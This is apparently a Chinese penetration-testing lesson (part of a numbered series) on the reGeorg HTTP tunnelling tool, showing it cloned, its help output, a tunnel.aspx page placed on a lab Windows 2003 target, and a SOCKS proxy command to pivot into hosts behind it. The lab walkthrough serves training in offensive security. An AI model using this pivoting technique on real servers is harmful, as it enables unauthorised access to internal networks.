reGeorg简介:

reGeorg 的前身是2008年 SensePost 在 BlackHat USA 2008 的 reDuh 延伸与扩展。也是目前安全从业人员使用最多,范围最广,支持多丰富的一款 http 隧道。从本质上讲,可以将 JSP/PHP/ASP/ASPX 等页面上传到目标服务器,便可以访问该服务器后面的主机。

2014年blackhat介绍
https://www.blackhat.com/eu-14/arsenal.html#regeorg

Github:
https://github.com/sensepost/reGeorg

攻击机:
192.168.1.5 Debian
192.168.1.4 Windows 7

靶机:
192.168.1.119 Windows 2003

安装:

  1. root@John:~# git clone https://github.com/sensepost/reGeorg.git
  2. Cloning into 'reGeorg'...
  3. remote: Enumerating objects: 85, done.
  4. remote: Total 85 (delta 0), reused 0 (delta 0), packreused 85
  5. Unpacking objects: 100% (85/85), done.
  6. root@John:~# cd reGeorg/
  7. root@John:~reGeorg# ls
  8. LICENSE.html LICENSE.txt README.md reGeorgSocksProxy.py tunnel.ashx tu
  9. nnel.aspx tunnel.js tunnel.jsp tunnel.nosocket.php tunnel.php tunnel.tomcat.5.jsp
  10. root@John:~/reGeorg# python reGeorgSocksProxy.py ‐h
  11. _____
  12. _____ ______ __|___ |__ ______ _____ _____ ______
  13. | | | ___|| ___| || ___|/ \| | | ___|
  14. | \ | ___|| | | || ___|| || \ | | |
  15. |__|\__\|______||______| __||______|\_____/|__|\__\|______|
  16. |_____|
  17. ... every office needs a tool like Georg
  18. willem@sensepost.com / @_w_m__
  19. sam@sensepost.com / @trowalts
  20. etienne@sensepost.com / @kamp_staaldraad
  21. usage: reGeorgSocksProxy.py [‐h] [‐l] [‐p] [‐r] u [‐v]
  22. Socks server for reGeorg HTTP(s) tunneller
  23. optional arguments:
  24. h, ‐‐help show this help message and exit
  25. l , ‐‐listenon The default listening address
  26. p , ‐‐listenport The default listening port
  27. r , ‐‐readbuff Local read buffer, max data to be sent per POST
  28. u , ‐‐url The url containing the tunnel script
  29. v , ‐‐verbose Verbose output[INFO\|DEBUG]
  1. root@John:~/reGeorg# pip install urllib3
  2. Requirement already satisfied: urllib3 in /usr/lib/python2.7/distpackages (1.24)

第九十八课:HTTP隧道reGeorg第二季 - 图1

靶机执行:

以aspx为demo。

第九十八课:HTTP隧道reGeorg第二季 - 图2

攻击机执行:

  1. python reGeorgSocksProxy.py p 8080 l 192.168.1.5 u http://192.168.1.119/tunnel.aspx

第九十八课:HTTP隧道reGeorg第二季 - 图3

Windows下配合Proxifier:

第九十八课:HTTP隧道reGeorg第二季 - 图4

第九十八课:HTTP隧道reGeorg第二季 - 图5

非常遗憾的是,目前大部分waf都会针对默认原装版本的reGeorg。

Micropoor